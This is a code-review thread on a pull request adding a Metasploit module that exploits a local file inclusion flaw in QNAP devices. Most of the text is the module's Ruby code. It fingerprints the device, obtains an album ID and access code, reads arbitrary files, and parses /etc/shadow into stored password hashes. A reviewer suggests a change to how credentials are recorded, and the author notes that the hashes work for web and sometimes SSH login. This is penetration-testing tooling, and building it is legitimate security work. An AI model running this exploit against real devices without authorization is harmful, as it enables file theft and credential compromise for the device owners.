modules/auxiliary/gather/qnap_lfi.rb

```diff
@@ -0,0 +1,204 @@
+  end
+
+  def get_album_id
+    print_status('Getting the Album Id')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'photo', 'p', 'api', 'album.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'a' => 'setSlideshow',
+        'f' => 'qsamplealbum'
+      }
+    })
+
+    if res && res.code == 200
+      xml_data = res.get_xml_document
+      output = xml_data.xpath('//output[1]')
+      return if output.empty?
+
+      [output.inner_text, res.get_cookies]
+    end
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'authLogin.cgi')
+    )
+
+    if res && res.code == 200 && (xml = res.get_xml_document)
+
+      info = %w[modelName version build patch].map do |node|
+        xml.at("//#{node}").text
+      end
+
+      vprint_status("QNAP #{info[0]} #{info[1..-1].join('-')} detected")
+
+      if info[2].to_i < 20191206
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Detected
+      end
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    if check == Exploit::CheckCode::Safe
+      print_error('Device does not appear to be a QNAP')
+      return
+    end
+
+    album_id, cookies = get_album_id
+
+    unless album_id
+      print_bad('Failed to retrieve the Album Id')
+      return
+    end
+
+    print_good("Got Album Id : #{album_id}")
+
+    access_code = get_access_code(album_id, cookies)
+
+    unless access_code
+      print_bad('Failed to retrieve the Access Code')
+      return
+    end
+
+    print_good("Got Access Code : #{access_code}")
+
+    file_content = exploit_lfi(datastore['FILEPATH'], album_id, access_code, cookies)
+
+    if file_content.nil? || file_content.empty?
+      print_bad('Failed to perform Local File Inclusion')
+      return
+  end
+
+    fname = File.basename(datastore['FILEPATH'])
+
+    path = store_loot(
+      'qnap.http',
+      'text/plain',
+      datastore['RHOST'],
+      file_content,
+      fname
+    )
+
+    print_good("File download successful, saved in #{path}")
+
+    print_good("File content:\n" + file_content) if datastore['PRINT']
+
+    return unless datastore['FILEPATH'] == '/etc/shadow'
+
+    print_status('adding the /etc/shadow entries to the database')
+
+    file_content.lines.each do |line|
+      entries = line.split(':')
+
+      next if entries[1] == '*' || entries[1] == '!' || entries[1] == '!!'
+
+      credential_data = {
+        origin_type: :service,
+        address: datastore['RHOST'],
+        port: datastore['RPORT'],
+        service_name: 'QNAP',
+        protocol: 'http',
+        module_fullname: fullname,
+        workspace_id: myworkspace_id,
+        post_reference_name: fullname,
+        username: entries[0],
+        private_data: entries[1],
+        jtr_format: identify_hash(entries[1]),
+        private_type: :nonreplayable_hash
+      }
+
+      create_credential(credential_data)
```

Comment:
The issue with credential storage is due to a parameter offered for the `service` does not match the expected types. `protocol` is meant to reflect the network protocol such as `tcp/udp` and `service_name` reflects the type of `service` in this case `http` or `https` depending on the endpoint.

Here is an example that reuses more `HttpClient` provided `service_details`.

```suggestion
      credential_data = {
        workspace_id: myworkspace_id, 
        post_reference_name: fullname,
        username: entries[0],
        private_data: entries[1],
        jtr_format: identify_hash(entries[1]),
        private_type: :nonreplayable_hash
        status: Metasploit::Model::Login::Status::UNTRIED 
      }.merge(service_details)

      create_credential_and_login(credential_data)
```

An example location where this is used already. https://github.com/rapid7/metasploit-framework/blob/334d65a565c1c2ca68d994d7ff675cbb68782400/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb#L232-L241

Reply:
> Do the retrieved shadow file entires represent the credentials that can login via the web interface?

Yes, they can be used from the web interface, in some cases, SSH can be enabled also, I'll update the documentation to indicate that.